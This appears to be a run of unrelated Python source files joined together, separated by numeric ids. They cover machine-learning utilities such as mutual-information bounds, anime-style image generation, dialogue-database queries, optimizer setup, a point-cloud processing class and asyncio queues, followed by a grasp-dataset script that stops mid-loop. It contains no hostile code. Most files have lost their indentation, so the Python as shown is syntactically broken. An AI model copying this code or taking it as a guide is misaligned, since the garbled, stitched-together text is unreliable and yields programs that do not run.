def load_data_providers_and_update_conf(config, include_test=False, dataset_name=None, shuffle=True, only_val=False, use_labels=False):
dataset_name = config["dataset_name"] if dataset_name is None else dataset_name
train_dp, val_dp, test_dp = load_data_providers(dataset_name,
config["n_batch"],
seed=config["data_seed"],
use_labels=use_labels,
frac=config["frac"],
shuffle=shuffle,
data_args=config["data_args"])
config.update({"n_dims": int(train_dp.n_dims), "n_samples": int(train_dp.n_samples)})
config.update({"n_val_samples": int(val_dp.n_samples)})
config.update({"train_data_stds": np.std(train_dp.data, axis=0)})
config.update({"train_data_min_max": [train_dp.data.min(), train_dp.data.max()]})
print("n_train, n_val: {}, {}".format(train_dp.n_samples, val_dp.n_samples))
if hasattr(train_dp.source, "cov_mat"):
config.update({"cov_mat": train_dp.source.cov_mat})
if hasattr(train_dp.source, "logit_alpha"):
config.update({"logit_alpha": train_dp.source.logit_alpha})
if hasattr(train_dp.source, "logit_shift"):
config.update({"preprocess_logit_shift": train_dp.source.logit_shift})
if hasattr(train_dp.source, "shift"):
config.update({"preprocess_shift": train_dp.source.shift})
if hasattr(train_dp, "labels") and train_dp.labels is not None:
labels = train_dp.labels
label_shape = labels.shape
if len(label_shape) == 2:
config["num_classification_problems"] = label_shape[1]
num_classes_per_problem = np.array([len(np.unique(labels[:, i])) for i in range(label_shape[1])])
config["num_classes_per_problem"] = num_classes_per_problem
config["max_num_classes"] = np.max(num_classes_per_problem)
else:
config["num_classification_problems"] = 1
config["max_num_classes"] = len(np.unique(labels))
if config["dataset_name"] == "multiomniglot":
config["true_mutual_info"] = np.sum(np.log(num_classes_per_problem))
if only_val:
return val_dp
elif include_test:
return train_dp, val_dp, test_dp
else:
return train_dp, val_dp
def dv_bound_fn(e1, e2):
term1 = np.mean(e1)
term2 = -logsumexp(e2) + np.log(len(e2))
bound = term1 + term2
return bound, term1, term2
def nwj_bound_fn(e1, e2):
term1 = np.mean(e1) + 1
term2 = - np.mean(np.exp(e2))
bound = term1 + term2
return bound, term1, term2
def log_sigmoid(x):
return np.minimum(x, 0) - np.log(1 + np.exp(-np.abs(x)))
def np_nce_loss(neg_energy1, neg_energy2, nu=1):
log_nu = np.log(nu)
term1 = log_sigmoid(neg_energy1 - log_nu) # (n, n_ratios)
term2 = log_sigmoid(log_nu - neg_energy2) # (n, n_ratios)
loss_term1 = -np.mean(term1, axis=0)
loss_term2 = -nu * np.mean(term2, axis=0)
loss = loss_term1 + loss_term2 # (n_ratios, )
return loss, loss_term1, loss_term2
def jensen_shannon_fn(e1, e2, logz):
m1 = np.stack([e1, np.ones_like(e1)*logz], axis=1)
m2 = np.stack([e2, np.ones_like(e2)*logz], axis=1)
term1 = np.log(2) + np.mean(e1) - np.mean(logsumexp(m1, axis=1))
term2 = np.log(2) + logz - np.mean(logsumexp(m2, axis=1))
return 0.5 * (term1 + term2)
def plot_chains_main(chains, name, save_dir, dp, config, vminmax = (0, 1), max_n_states=10):
if (config.dataset_name in IMG_DATASETS) or ("pca" in config.dataset_name):
max_n_chains = 10000
skip_n = max(1, int(len(chains) / max_n_chains))
x = revert_data_preprocessing(chains[::skip_n], dp, is_wmark_input=True)
layout_dim = 7
n_pages = int(np.ceil(len(x) / layout_dim ** 2))
disp_imdata(imgs=x[:, -1, ...],
dataset_name=config.dataset_name,
dir_name=os.path.join(save_dir, "{}_final_states/".format(name)),
layout=[layout_dim, layout_dim],
num_pages=n_pages,
vminmax=vminmax
)
if chains.shape[1] > 1:
# plot all states for individual chains
n_chains_to_plot = min(50, len(x))
n_chains_in_figure = 10
n_figures = int(np.ceil(n_chains_to_plot / n_chains_in_figure))
n_skip = int(np.ceil(x.shape[1] / min(max_n_states, x.shape[1])))
n_states_in_figure = int(np.ceil(x.shape[1] / n_skip))
chains_event_dims = x.shape[2:]
for i in range(n_figures):
disp_imdata(imgs=x[n_chains_in_figure * i:n_chains_in_figure * (i + 1), ::n_skip].reshape(-1, *chains_event_dims),
dataset_name=config.dataset_name,
dir_name=os.path.join(save_dir, "{}_whole_chains/".format(name)),
# layout=[int(np.ceil(len(chains[i]) ** 0.5))] * 2,
layout=[n_chains_in_figure, n_states_in_figure],
name=str(i),
vminmax=vminmax
)
def revert_data_preprocessing(data, dp, is_wmark_input):
if is_wmark_input:
n, k, event_dims = data.shape[0], data.shape[1], data.shape[2:]
data = data.reshape((-1, *event_dims)) # (n*k, ...)
data = dp.source.reverse_preprocessing(data)
if is_wmark_input:
event_dims = data.shape[1:]
data = data.reshape(n, k, *event_dims) # (n, k, ...)
return data
def logit_inv(x, alpha):
return (sigmoid(x) - alpha)/(1 - 2 * alpha)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
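# Sanity-check sketch (illustrative only): log_sigmoid matches the naive
# log(sigmoid(x)) where the latter is stable, and stays finite for large
# negative inputs where sigmoid underflows to 0.
_x = np.array([-1.0, 0.0, 2.5])
assert np.allclose(log_sigmoid(_x), np.log(sigmoid(_x)))
assert log_sigmoid(np.array([-1000.0]))[0] == -1000.0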
|
411804
|
import os
import torch
from torchvision.utils import save_image
from config import *
from selfie2anime import get_selfie2anime_loader
from models import Generator
from utils import denorm, make_dirs, make_gifs_test
# Device Configuration #
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def inference():
# Inference Path #
make_dirs(config.inference_path)
# Prepare Data Loader #
test_loader_selfie, test_loader_anime = get_selfie2anime_loader('test', config.batch_size)
# Prepare Generator #
G_A2B = Generator(image_size=config.crop_size, num_blocks=config.num_blocks).to(device)
G_A2B.load_state_dict(torch.load(os.path.join(config.weights_path, 'U-GAT-IT_G_A2B_Epoch_{}.pkl'.format(config.num_epochs))))
# Inference #
print("U-GAT-IT | Generating Selfie2Anime images started...")
with torch.no_grad():
for i, (selfie, anime) in enumerate(zip(test_loader_selfie, test_loader_anime)):
# Prepare Data #
real_A = selfie.to(device)
# Generate Fake Images #
fake_B = G_A2B(real_A)[0]
# Save Images (Selfie -> Anime) #
result = torch.cat((real_A, fake_B), dim=0)
save_image(denorm(result.data),
os.path.join(config.inference_path, 'U-GAT-IT_Selfie2Anime_Results_%03d.png' % (i + 1))
)
# Make a GIF file #
make_gifs_test("U-GAT-IT", "Selfie2Anime", config.inference_path)
if __name__ == '__main__':
inference()
|
411877
|
import json
import os
import random
import zipfile
from convlab2.util.file_util import cached_path
def auto_download():
model_path = os.path.join(os.path.dirname(__file__), os.pardir, 'model')
data_path = os.path.join(os.path.dirname(__file__), os.pardir, 'data')
db_path = os.path.join(os.path.dirname(__file__), os.pardir, 'db')
root_path = os.path.join(os.path.dirname(__file__), os.pardir)
urls = {model_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_model.zip',
data_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_data.zip',
db_path: 'https://convlab.blob.core.windows.net/convlab-2/mdrg_db.zip'}
for path in [model_path, data_path, db_path]:
if not os.path.exists(path):
file_url = urls[path]
print('Downloading from: ', file_url)
archive_file = cached_path(file_url)
print('Extracting...')
archive = zipfile.ZipFile(archive_file, 'r')
archive.extractall(root_path)
# loading databases
domains = ['restaurant', 'hotel', 'attraction', 'train', 'hospital', 'taxi', 'police']
dbs = {}
auto_download()
for domain in domains:
dbs[domain] = json.load(open(os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'db/{}_db.json'.format(domain))))
def query(domain, constraints, ignore_open=True):
"""Returns the list of entities for a given domain
based on the annotation of the belief state"""
# query the db
if domain == 'taxi':
return [{'taxi_colors': random.choice(dbs[domain]['taxi_colors']),
'taxi_types': random.choice(dbs[domain]['taxi_types']),
'taxi_phone': [random.randint(1, 9) for _ in range(10)]}]
if domain == 'police':
return dbs['police']
if domain == 'hospital':
return dbs['hospital']
found = []
for record in dbs[domain]:
for key, val in constraints:
if val == "" or val == "dont care" or val == 'not mentioned' or val == "don't care" or val == "dontcare" or val == "do n't care":
pass
else:
if key not in record:
continue
if key == 'leaveAt':
val1 = int(val.split(':')[0]) * 100 + int(val.split(':')[1])
val2 = int(record['leaveAt'].split(':')[0]) * 100 + int(record['leaveAt'].split(':')[1])
if val1 > val2:
break
elif key == 'arriveBy':
val1 = int(val.split(':')[0]) * 100 + int(val.split(':')[1])
val2 = int(record['arriveBy'].split(':')[0]) * 100 + int(record['arriveBy'].split(':')[1])
if val1 < val2:
break
# elif ignore_open and key in ['destination', 'departure', 'name']:
elif ignore_open and key in ['destination', 'departure']:
continue
else:
if val.strip() != record[key].strip():
break
else:
found.append(record)
return found
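# Usage sketch (illustrative only; the slot names and values follow the
# MultiWOZ belief-state annotation and are assumptions here):
#
#   cheap_central_hotels = query('hotel', [('area', 'centre'), ('pricerange', 'cheap')])
#   morning_trains = query('train', [('leaveAt', '09:00'), ('destination', 'cambridge')])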
|
411929
|
import torch
import os
os.environ['TORCH_HOME'] = './'
import torch.nn as nn
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data.dataset import Dataset # For custom datasets
from torch.utils.data import DataLoader
from model import UNet, UNet_2
from dorn import DORN
from dataset import AffineDataset, AffineTestsDataset
import numpy as np
from tensorboardX import SummaryWriter
import argparse
import skimage.io as sio
import sys
import Render.render as render
import math
from time import time
train_dataset = AffineTestsDataset(feat=0,root='data')
sample_batched = train_dataset[35]
color = np.ascontiguousarray(np.transpose(sample_batched['image'][0:3,:,:], (1, 2, 0)).astype('float32'))
labels = np.transpose(sample_batched['label'].numpy(), (1, 2, 0))
Qx = np.ascontiguousarray(labels[:,:,0:2].astype('float32'))
Qy = np.ascontiguousarray(labels[:,:,2:4].astype('float32'))
sio.imsave('color.png', color)
render.visualizeDirection('vis.png', color, Qx, Qy)
|
411970
|
import torch
import torch.nn as nn
from torch import optim
from sampler import PKSampler, PKSampler2
def get_Sampler(sampler,dataset,p=15,k=20):
if sampler == 'all':
return PKSampler2(dataset, p=p, k=k)
else:
return PKSampler(dataset, p=p, k=k)
def get_Optimizer(model, optimizer_type=None, lr=1e-3, weight_decay=1e-3):
if(optimizer_type=='sgd'):
return optim.SGD(model.parameters(), lr=lr, momentum=0.9, nesterov=True, weight_decay=weight_decay)
elif(optimizer_type=='rmsprop'):
return optim.RMSprop(model.parameters(), lr=lr, weight_decay=weight_decay)
elif(optimizer_type=='adadelta'):
return optim.Adadelta(model.parameters(), lr=lr, weight_decay=weight_decay)
else:
return optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
def get_Scheduler(optimizer, lr, scheduler_name=None):
if(scheduler_name=='cyclic'):
return optim.lr_scheduler.CyclicLR(optimizer, base_lr=5e-4, max_lr=lr, step_size_up=500)
elif(scheduler_name=='cosine'):
return optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=1000)
elif(scheduler_name=='multistep'):
# return optim.lr_scheduler.MultiStepLR(optimizer, milestones=[3,13,30], gamma=0.3)
return optim.lr_scheduler.MultiStepLR(optimizer, milestones=[6,20,40], gamma=0.1)
else:
return optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.99)
|
411994
|
from __future__ import annotations
import datetime
import warnings
from pathlib import Path
from typing import List, Literal, Union
import numpy as np
import open3d
import pandas
import plotly
import plotly.express as px
import pyntcloud
from pointcloudset.diff import ALL_DIFFS
from pointcloudset.filter import ALL_FILTERS
from pointcloudset.io import (
POINTCLOUD_FROM_FILE,
POINTCLOUD_FROM_INSTANCE,
POINTCLOUD_TO_FILE,
POINTCLOUD_TO_INSTANCE,
)
from pointcloudset.plot.pointcloud import plot_overlay
from pointcloudset.pointcloud_core import PointCloudCore
from pointcloudset.config import PLOTLYSIZELIMIT
class PointCloud(PointCloudCore):
"""
PointCloud Class with one pointcloud of lidar measurements, laser scanning,
photogrammetry or similar.
One PointCloud consists mainly of `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_
pointcloud
(`PyntCloud.points <https://pyntcloud.readthedocs.io/en/latest/points.html#points>`_)
and a pandas.DataFrame (.data) with all the associated data.
Note that the index of the points is not preserved when applying processing. This
is necessary since `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_
does not allow passing the index. Therefore, a new PointCloud object is generated at
each processing stage.
Developer notes:
* All operations have to act on both, pointcloud and data and keep the timestamp.
* All processing methods need to return another PointCloud.
Examples:
.. code-block:: python
testbag = Path().cwd().parent.joinpath("tests/testdata/test.bag")
testset = pointcloudset.Dataset(testbag,topic="/os1_cloud_node/points",
keep_zeros=False)
testpointcloud = testset[0]
"""
@classmethod
def from_file(cls, file_path: Path, **kwargs):
"""Extract data from file and construct a PointCloud with it. Uses
`PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_ as
backend.
Args:
file_path (pathlib.Path): Path of file to read.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: PointCloud with timestamp last modified.
Raises:
ValueError: If file format is not supported.
TypeError: If file_path is no Path object.
"""
if not isinstance(file_path, Path):
raise TypeError("Expecting a Path object for file_path")
ext = file_path.suffix[1:].upper()
if ext not in POINTCLOUD_FROM_FILE:
raise ValueError(
"Unsupported file format; supported formats are: {}".format(
list(POINTCLOUD_FROM_FILE)
)
)
file_path_str = file_path.as_posix()
timestamp = datetime.datetime.utcfromtimestamp(file_path.stat().st_mtime)
pyntcloud_in = pyntcloud.PyntCloud.from_file(file_path_str, **kwargs)
return cls(
data=pyntcloud_in.points, orig_file=file_path_str, timestamp=timestamp
)
def to_file(self, file_path: Path = Path(), **kwargs) -> None:
"""Exports the pointcloud as to a file for use with `CloudCompare <https://www.danielgm.net/cc/ake>`_ or similar tools.
Currently not all attributes of a pointcloud are saved so some information is lost
when using this function.
Uses `PyntCloud <https://pyntcloud.readthedocs.io/en/latest/>`_ as
backend.
Args:
file_path (pathlib.Path, optional): Destination. Defaults to the folder of
the bag file and csv with the timestamp of the pointcloud.
**kwargs: Keyword arguments to pass to func.
Raises:
ValueError: If file format is not supported.
"""
ext = file_path.suffix[1:].upper()
if ext not in POINTCLOUD_TO_FILE:
raise ValueError(
"Unsupported file format; supported formats are: {}".format(
list(POINTCLOUD_TO_FILE)
)
)
orig_file_name = Path(self.orig_file).stem
if file_path == Path():
# defaulting to csv file
filename = f"{orig_file_name}_timestamp_{self.timestamp}.csv"
destination_folder = Path(self.orig_file).parent.joinpath(filename)
else:
destination_folder = file_path
kwargs["file_path"] = destination_folder
kwargs["pointcloud"] = self
POINTCLOUD_TO_FILE[ext](**kwargs)
@classmethod
def from_instance(
cls,
library: Literal["PYNTCLOUD", "OPEN3D", "DATAFRAME", "PANDAS"],
instance: Union[
pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud
],
**kwargs,
) -> PointCloud:
"""Converts a library instance to a pointcloudset PointCloud.
Args:
library (str): Name of the library.\n
If PYNTCLOUD: :func:`pointcloudset.io.pointcloud.pyntcloud.from_pyntcloud`\n
If OPEN3D: :func:`pointcloudset.io.pointcloud.open3d.from_open3d`\n
If DATAFRAME: :func:`pointcloudset.io.pointcloud.pandas.from_dataframe`\n
If PANDAS: :func:`pointcloudset.io.pointcloud.pandas.from_dataframe`
instance
(Union[pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud]):
Library instance to convert.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: Derived from the instance.
Raises:
ValueError: If instance is not supported.
Examples:
.. code-block:: python
testpointcloud = from_instance("OPEN3D", open3d_pointcloud)
"""
library = library.upper()
if library not in POINTCLOUD_FROM_INSTANCE:
raise ValueError(
"Unsupported library; supported libraries are: {}".format(
list(POINTCLOUD_FROM_INSTANCE)
)
)
else:
return cls(**POINTCLOUD_FROM_INSTANCE[library](instance, **kwargs))
def to_instance(
self, library: Literal["PYNTCLOUD", "OPEN3D", "DATAFRAME", "PANDAS"], **kwargs
) -> Union[
pyntcloud.PyntCloud,
open3d.geometry.PointCloud,
pandas.DataFrame,
]:
"""Convert PointCloud to another library instance.
Args:
library (str): Name of the library.\n
If PYNTCLOUD: :func:`pointcloudset.io.pointcloud.pyntcloud.to_pyntcloud`\n
If OPEN3D: :func:`pointcloudset.io.pointcloud.open3d.to_open3d`\n
If DATAFRAME: :func:`pointcloudset.io.pointcloud.pandas.to_dataframe`\n
If PANDAS: :func:`pointcloudset.io.pointcloud.pandas.to_dataframe`
**kwargs: Keyword arguments to pass to func.
Returns:
Union[ pandas.DataFrame, pyntcloud.PyntCloud, open3d.geometry.PointCloud ]:
The derived instance.
Raises:
ValueError: If library is not supported.
Examples:
.. code-block:: python
open3d_pointcloud = testpointcloud.to_instance("OPEN3D")
"""
library = library.upper()
if library not in POINTCLOUD_TO_INSTANCE:
raise ValueError(
"Unsupported library; supported libraries are: {}".format(
list(POINTCLOUD_TO_INSTANCE)
)
)
return POINTCLOUD_TO_INSTANCE[library](self, **kwargs)
def plot(
self,
color: Union[None, str] = None,
overlay: dict = {},
point_size: float = 2,
prepend_id: str = "",
hover_data: Union[List[str], bool] = None,
**kwargs,
) -> plotly.graph_objs.Figure:
"""Plot a PointCloud as a 3D scatter plot with `Plotly <https://plotly.com/>`_.
It handles plots of single pointclouds and overlay with other objects, such as
other pointclouds from clustering or planes from plane segmentation.
You can also pass arguments to the `Plotly <https://plotly.com/>`_
express function :func:`plotly.express.scatter_3d`.
Args:
pointcloud (PointCloud): The pointcloud to plot.
color (str or None): Which column to plot. For example "intensity".
Defaults to None.
overlay (dict, optional): Dict with PointClouds to overlay.
{"Cluster 1": cluster1,"Plane 1": plane_model}\n
See also: :func:`pointcloudset.plot.pointcloud.plot_overlay`\n
Defaults to empty.
point_size (float, optional): Size of each point. Defaults to 2.
prepend_id (str, optional): String before point id to display in hover.
Defaults to empty.
hover_data (list(str) or True, optional): Data columns to display in hover. If True
then all the columns are shown in the hover.
Defaults to None.
**kwargs: Keyword arguments to pass to func.
Returns:
plotly.graph_objs.Figure: The interactive Plotly plot, best used inside a
Jupyter Notebook.
Raises:
ValueError: If the color column name is not in the data.
"""
if color is not None and color not in self.data.columns:
raise ValueError(f"choose any of {list(self.data.columns)} or None")
if len(self) > PLOTLYSIZELIMIT:
warnings.warn(
f"""Pointcloud above limit of {PLOTLYSIZELIMIT}.
Plotting might fail or take a long time.
Consider downsampling before plotting.
for example: pointcloud.random_down_sample(10000).plot()"""
)
ids = [prepend_id + "id=" + str(i) for i in range(self.data.shape[0])]
show_hover = True
if hover_data is None:
show_hover = False
elif hover_data is True:
hover_data = list(self.data.columns)
elif isinstance(hover_data, list) & len(hover_data) > 0:
if self.has_original_id:
default = ["original_id"]
hover_data = hover_data + default
hover_data = list(set(hover_data))
if any(x not in self.data.columns for x in hover_data):
raise ValueError(f"choose a list of {list(self.data.columns)} or []")
fig = px.scatter_3d(
self.data,
x="x",
y="y",
z="z",
color=color,
hover_name=ids,
hover_data=hover_data,
title=self.timestamp_str,
**kwargs,
)
if overlay:
fig = plot_overlay(
fig,
self,
overlay,
hover_data=hover_data,
**kwargs,
)
fig.update_layout(scene_aspectmode="data")
if not show_hover:
fig.update_layout(hovermode=False)
fig.update_traces(
marker=dict(size=point_size, line=dict(width=0)),
selector=dict(mode="markers"),
)
return fig
def diff(
self,
name: Literal["origin", "plane", "pointcloud", "point"],
target: Union[None, PointCloud, np.ndarray] = None,
**kwargs,
) -> PointCloud:
"""Calculate differences and distances to the origin, plane, point and pointcloud.
Args:
name (str):
"origin": :func:`pointcloudset.diff.origin.calculate_distance_to_origin` \n
"plane": :func:`pointcloudset.diff.plane.calculate_distance_to_plane` \n
"pointcloud": :func:`pointcloudset.diff.pointcloud.calculate_distance_to_pointcloud` \n
"point": :func:`pointcloudset.diff.point.calculate_distance_to_point` \n
target (Union[None, PointCloud, numpy.ndarray], optional): Pass argument
according to chosen object. Defaults to None.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: New PointCloud with added column of the differences.
Raises:
ValueError: If name is not supported.
Examples:
.. code-block:: python
newpointcloud = testpointcloud.diff("pointcloud", targetpointcloud)
"""
if name in ALL_DIFFS:
ALL_DIFFS[name](pointcloud=self, target=target, **kwargs)
return self
else:
raise ValueError("Unsupported diff. Check docstring")
def filter(
self, name: Literal["quantile", "value", "radiusoutlier"], *args, **kwargs
) -> PointCloud:
"""Filters a PointCloud according to criteria.
Args:
name (str):
"quantile": :func:`pointcloudset.filter.stat.quantile_filter` \n
"value": :func:`pointcloudset.filter.stat.value_filter` \n
"radiusoutlier": :func:`pointcloudset.filter.stat.remove_radius_outlier` \n
*args: Positional arguments to pass to func.
**kwargs: Keyword arguments to pass to func.
Returns:
PointCloud: PointCloud which fulfills the criteria.
Raises:
ValueError: If name is not supported.
Examples:
.. code-block:: python
filteredpointcloud = testpointcloud.filter("quantile","intensity","==",0.5)
.. code-block:: python
filteredpointcloud = testpointcloud.filter("value","intensity",">",100)
"""
name = name.upper()
if name in ALL_FILTERS:
return ALL_FILTERS[name](self, *args, **kwargs)
else:
raise ValueError("Unsupported filter. Check docstring")
def limit(self, dim: "str", minvalue: float, maxvalue: float) -> PointCloud:
"""Limit the range of certain values in pointcloudset PointCloud. Can be chained together.
Args:
dim (str): Dimension to limit, any column in data not just x, y, or z.
minvalue (float): Min value to limit. (greater equal)
maxvalue (float): Max value to limit. (smaller equal)
Returns:
PointCloud: Limited pointcloud, where points which did not match the criteria were
dropped.
Examples:
.. code-block:: python
limitedpointcloud = testpointcloud.limit("x", -1.0, 1.0).limit("intensity", 0.0, 50.0)
"""
if maxvalue < minvalue:
raise ValueError("maxvalue must be greater than minvalue")
return self.filter("value", dim, ">=", minvalue).filter(
"value", dim, "<=", maxvalue
)
def apply_filter(self, filter_result: Union[np.ndarray, List[int]]) -> PointCloud:
"""Generating a new PointCloud by removing points according to a call of the
filter method.
Args:
filter_result (Union[numpy.ndarray, List[int]]): Filter result.
Returns:
PointCloud: PointCloud with filtered rows and reindexed data and points.
Raises:
TypeError: If the filter_result has the wrong type.
"""
if isinstance(filter_result, np.ndarray):
# dataframe and pyntcloud based filters
new_data = self.data.loc[filter_result].reset_index(drop=True)
elif isinstance(filter_result, list):
# from open3d filters
new_data = self.data.iloc[filter_result].reset_index(drop=True)
else:
raise TypeError(
(
"Wrong filter_result expecting array with boolean values or"
"list of indices"
)
)
return PointCloud(new_data, timestamp=self.timestamp)
def get_cluster(self, eps: float, min_points: int) -> pandas.DataFrame:
"""Get the clusters based on
:meth:`open3d:open3d.geometry.PointCloud.cluster_dbscan`.
Process further with :func:`pointcloudset.pointcloud.PointCloud.take_cluster`.
Args:
eps (float): Density parameter that is used to find neighboring points.
min_points (int): Minimum number of points to form a cluster.
Returns:
pandas.DataFrame: Dataframe with list of clusters.
"""
labels = np.array(
self.to_instance("open3d").cluster_dbscan(
eps=eps, min_points=min_points, print_progress=False
)
)
return pandas.DataFrame(labels, columns=["cluster"])
def take_cluster(
self, cluster_number: int, cluster_labels: pandas.DataFrame
) -> PointCloud:
"""Takes only the points belonging to the cluster_number.
Args:
cluster_number (int): Cluster ID to keep.
cluster_labels (pandas.DataFrame): Clusters generated with
:func:`pointcloudset.pointcloud.PointCloud.get_cluster`.
Returns:
PointCloud: PointCloud with selected cluster.
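Examples:
A minimal sketch, assuming ``clusters`` was produced by :func:`pointcloudset.pointcloud.PointCloud.get_cluster` on ``testpointcloud``.
.. code-block:: python
clusterpointcloud = testpointcloud.take_cluster(0, clusters)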
"""
bool_array = (cluster_labels["cluster"] == cluster_number).values
return self.apply_filter(bool_array)
def plane_segmentation(
self,
distance_threshold: float,
ransac_n: int,
num_iterations: int,
return_plane_model: bool = False,
) -> Union[PointCloud, dict]:
"""Segments a plane in the point cloud using the RANSAC algorithm.
Based on :meth:`open3d:open3d.geometry.PointCloud.segment_plane`.
Args:
distance_threshold (float): Max distance a point can be from the plane
model, and still be considered as an inlier.
ransac_n (int): Number of initial points to be considered inliers in
each iteration.
num_iterations (int): Number of iterations.
return_plane_model (bool, optional): Return also plane model parameters
if ``True``. Defaults to ``False``.
Returns:
PointCloud or dict: PointCloud with inliers or a dict of PointCloud with inliers and the
plane parameters.
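Examples:
A minimal sketch with illustrative parameter values, assuming ``testpointcloud`` is an existing PointCloud.
.. code-block:: python
plane = testpointcloud.plane_segmentation(distance_threshold=0.01, ransac_n=3, num_iterations=500)
plane_and_model = testpointcloud.plane_segmentation(distance_threshold=0.01, ransac_n=3, num_iterations=500, return_plane_model=True)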
"""
pcd = self.to_instance("open3d")
plane_model, inliers = pcd.segment_plane(
distance_threshold=distance_threshold,
ransac_n=ransac_n,
num_iterations=num_iterations,
)
if len(self) > 200:
warnings.warn(
"""Might not produce reproduceable resuts, if the number of points
is high. Try to reduce the area of interest before using
plane_segmentation. Caused by open3D."""
)
inlier_pointcloud = self.apply_filter(inliers)
if return_plane_model:
return {"PointCloud": inlier_pointcloud, "plane_model": plane_model}
else:
return inlier_pointcloud
def random_down_sample(self, number_of_points: int) -> PointCloud:
"""Function to downsample input pointcloud into output pointcloud randomly.
Made
Args:
number_of_points ([int]): number_of_points
Returns:
PointCloud: subsampled PointCloud
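Examples:
A minimal sketch, assuming ``testpointcloud`` is an existing PointCloud with at least 1000 points; the sample size is illustrative.
.. code-block:: python
smallerpointcloud = testpointcloud.random_down_sample(1000)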
"""
new_data = self.data.sample(number_of_points).reset_index(drop=True)
return PointCloud(new_data, timestamp=self.timestamp)
|
412008
|
import asyncio
import uvloop
# All queues share a single uvloop event loop so they can be awaited from the same loop.
loop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
def get_new_uvloop_queue():
    return asyncio.Queue(loop=loop)
new_messages = get_new_uvloop_queue()
users_changed = get_new_uvloop_queue()
online = get_new_uvloop_queue()
offline = get_new_uvloop_queue()
check_online = get_new_uvloop_queue()
is_typing = get_new_uvloop_queue()
read_unread = get_new_uvloop_queue()
|
412017
|
import numpy as np, tensorflow as tf, aolib.util as ut, aolib.img as ig, os, sys, sklearn.svm, press, copy, sklearn.pipeline
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets as nets
import vgg, h5py
import sklearn.metrics
pj = ut.pjoin
full_dim = 256
crop_dim = 224
#gpu = '/gpu:0'
init_path = '../results/vgg_16.ckpt'
label_path = '../data/grasp'
checkpoint_iters = 1000
ed = tf.expand_dims
im_names = 'gel0_pre gel1_pre gel0_post gel1_post im0_pre im0_post depth0_pre depth0_post'.split()
write_data_gpu = 0
press_model_file = '../results/press-data-v11/training/net.tf-4600'
ee_dim = 4
def download_pretrained():
# https://github.com/tensorflow/models/tree/master/slim
ut.mkdir('../results')
ut.sys_check('wget http://download.tensorflow.org/models/vgg_16_2016_08_28.tar.gz '
' -O ../results/vgg_16_2016_08_28.tar.gz')
ut.sys_check('cd ../results; tar -xzf vgg_16_2016_08_28.tar.gz')
def moving_avg(name, x, vals = {}, avg_win_size = 100):
ut.add_dict_list(vals, name, x)
return np.mean(vals[name][-avg_win_size:])
def shape(x, d = None):
s = x.get_shape().as_list()
return s if d is None else s[d]
def name_from_file(db_file):
#return '_'.join(x.split('/')[-1].split('_')[2:])
with h5py.File(db_file, 'r') as db:
#print db.keys()
name = str(np.array(db['object_name'].value)[0])
name = remap_name(name)
#print db_file, '->', name
return name
def db_ok(db_file):
try:
with h5py.File(db_file, 'r') as db:
ks = db.keys()
reqs = ['GelSightA_image', 'GelSightB_image',
'is_gripping', 'angle_of_EE_at_grasping',
'location_of_EE_at_grasping', 'object_name',
'time_pre_grasping', 'time_post1_grasping',
'color_image_KinectA', 'depth_image_KinectA',
'timestamp']
for r in reqs:
if r not in ks:
print db_file, 'is missing', r
return False
return True
except:
return False
def crop_kinect(im):
# the bounds of the table, plus some padding above for tall objects
bounds = np.array([[ 0.28602991, 0.07516428],
[ 0.76788474, 0.06441159],
[ 0.97554603, 0.59487754],
[ 0.13482023, 0.60563023]])
d = np.array([im.shape[1], im.shape[0]])
x0, y0 = map(int, bounds.min(0) * d)
x1, y1 = map(int, bounds.max(0) * d)
return im[y0 : y1, x0 : x1]
def milestone_frames(db):
times = np.array(db['/timestamp'].value)
pre = np.argmin(np.abs(db['time_pre_grasping'].value - times))
mid = np.argmin(np.abs(db['time_at_grasping'].value - times))
post = np.argmin(np.abs(db['time_post1_grasping'].value - times))
return pre, mid, post
def remap_name(name):
remap = {'plastic_duc': 'plastic_duck',
'hair_dryer_': 'hair_dryer_spiky_nozzle',
'light_blue_': 'light_blue_translucent_object',
'brown_paper': 'brown_paper_bag',
'beans_in_pa': 'beans_in_paper_container',
'shampoo_whi': 'shampoo_white_bottle',
'small_blue_': 'small_blue_plastic_spoon',
'dove_deodor': 'dove_deodorant',
'yellow_bulb': 'yellow_bulb_man',
'toy_person_with_hat': 'set_small_plastic_men_yellow_construction_worker'}
return remap.get(name, name)
#def write_data(out_dir, train_frac = 0.75, val_frac = 0.05):
#def write_data(out_dir, rebalance_data = False, train_frac = 0.75, val_frac = 0.0, n = None):
def write_data(out_dir, rebalance_data = True, train_frac = 0.75, val_frac = 0.0, n = None):
#def write_data(out_dir, rebalance_data = True, train_frac = 0.75, val_frac = 0.0, n = 10):
assert not os.path.exists(out_dir)
ut.mkdir(out_dir)
base_data = '../data/grasp/'
ut.sys_check('find -L %s -name "*.hdf5" > %s/all_db_files.txt' % (base_data, out_dir))
all_db_files = ut.read_lines(pj(out_dir, 'all_db_files.txt'))[:n]
all_db_files = ut.shuffled_with_seed(all_db_files)
all_db_files = filter(db_ok, all_db_files)
ut.write_lines(pj(out_dir, 'db_files.txt'), all_db_files)
by_name = ut.accum_dict((name_from_file(x), x) for x in all_db_files)
names = ut.shuffled_with_seed(sorted(by_name.keys()))
num_names = len(names)
num_train = int(train_frac * num_names)
num_val = int(val_frac * num_names)
i = 0
train_names = names[i : num_train]
i += num_train
val_names = names[i : i + num_val]
i += num_val
test_names = names[i:]
print num_train, num_val, len(test_names)
splits = [('train', train_names),
('val', val_names),
('test', test_names)]
print 'Number of objects in each split:'
for s, o in splits:
